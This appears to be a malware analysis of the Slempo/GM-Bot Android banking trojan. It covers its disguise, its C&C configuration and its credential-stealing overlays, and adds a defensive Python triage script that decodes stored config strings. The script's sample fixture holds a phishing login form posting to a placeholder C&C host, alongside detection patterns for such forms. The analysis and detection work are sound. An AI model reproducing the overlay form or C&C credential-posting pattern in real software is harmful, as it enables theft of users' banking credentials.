Slempo/GM-Bot requires little introduction, as it has been the focal point of many recent publications and is a well-known threat in the world of mobile malware.
In most cases Slempo/GM-Bot presents itself as an “Adobe Flash Player Update”. This disguise is very popular in the mobile malware sphere and is used to trick the user into granting the malicious application administrator privileges.
Once the user accepts, the malware is installed on the device and is capable of controlling it. Among the malware’s many functionalities are:
Intercept, redirect and block SMS messages and calls
Lock and unlock the device
Wipe the device
Display its own content over legitimate applications
Send stolen user credentials (obtained by displaying fake content) back to the Command & Control server.
After completing initial installation, the malware contacts its Command & Control server, sends it a list of all applications installed on the device along with various other device information, and downloads a configuration file, which it saves locally on the device at the following path: /data/data/%App_Name%/shared_prefs/AppPrefs.xml
This configuration file contains the applications that the malware targets for credential harvesting, and the fraudulent content that performs that harvesting.
Fig. 1 – Device data and installed applications sent to C&C server.
Encoded Configuration & Fraudulent Activity
The encoded configuration file which is downloaded from the Command & Control server contains the targeted application names and content to be displayed to the victim upon activation of a targeted application, as can be seen below:
Fig. 2 – A snippet of the encoded configuration file
Fig. 3 – Decoded configuration snippet showing the fraudulent HTML content that is displayed on top of the targeted application and harvests the user’s credentials.
When the malware detects activation of a targeted application, the fraudulent content contained in the configuration file is displayed to the victim on top of the targeted application:
Fig. 4 – Fraudulent content displayed on top of legitimate application.
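The configuration file and overlay mechanism described above lend themselves to a simple forensic triage step: given an extracted shared_prefs/AppPrefs.xml, decode each stored string and flag any that contain a credential-harvesting HTML form. The following is an added example for analysts, not code from the malware or from the original report; it assumes the strings are base64-encoded (the actual encoding scheme is not shown here) and uses a constructed sample file with placeholder key names and URLs.

```python
import base64
import binascii
import re
import xml.etree.ElementTree as ET

# Indicators of credential-phishing overlay HTML inside a decoded string.
OVERLAY_PATTERNS = {
    "html_form": re.compile(r"<form\b", re.I),
    "password_field": re.compile(r"<input[^>]*type=[\"']?password", re.I),
    "exfil_url": re.compile(r"action=[\"']?(https?://[^\"'\s>]+)", re.I),
}


def try_base64(value):
    """Return the decoded text if value is valid base64 UTF-8 text, else None."""
    try:
        return base64.b64decode(value, validate=True).decode("utf-8")
    except (binascii.Error, UnicodeDecodeError, ValueError):
        return None


def find_overlay_entries(prefs_xml):
    """Scan an Android SharedPreferences XML document for encoded overlay HTML.

    Returns a list of (key, indicators) for every <string> whose value decodes
    to HTML carrying a login form or a password field; indicators maps each
    matched pattern name to True, or to the captured URL for exfil_url."""
    data = prefs_xml.encode("utf-8") if isinstance(prefs_xml, str) else prefs_xml
    findings = []
    for node in ET.fromstring(data).iter("string"):
        decoded = try_base64((node.text or "").strip())
        if decoded is None:
            continue
        hits = {}
        for name, pattern in OVERLAY_PATTERNS.items():
            m = pattern.search(decoded)
            if m:
                hits[name] = m.group(1) if m.groups() else True
        if "html_form" in hits or "password_field" in hits:
            findings.append((node.get("name"), hits))
    return findings


# Constructed sample in the layout of /data/data/<pkg>/shared_prefs/AppPrefs.xml.
# Key names, package names and the URL are placeholders (assumptions).
FAKE_OVERLAY = ('<html><body><form action="http://c2.example.invalid/gate.php" method="post">'
                '<input name="login"><input name="password" type="password"></form></body></html>')
SAMPLE_PREFS = f"""<?xml version='1.0' encoding='utf-8' standalone='yes' ?>
<map>
    <string name="last_sync">1462000000</string>
    <string name="inj_com.example.bank">{base64.b64encode(FAKE_OVERLAY.encode()).decode()}</string>
    <string name="targets">{base64.b64encode(b"com.example.bank;com.example.pay").decode()}</string>
</map>"""
```

Only the entry that decodes to a login form is reported; the target-package list decodes cleanly but carries no form, so it is left for manual review.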
After the victim enters their credentials into what they perceive to be the legitimate application, the malware sends the credentials to its C&C server, as seen below:
Fig. 5 – Victim’s credentials are sent to the C&C server.
Slempo targets a wide variety of financial and non-financial applications worldwide, as can be seen in the chart below:
Fig. 5 – Slempo Target Distribution.
NOTE: Applications which are not region or country specific are categorized as “Other”.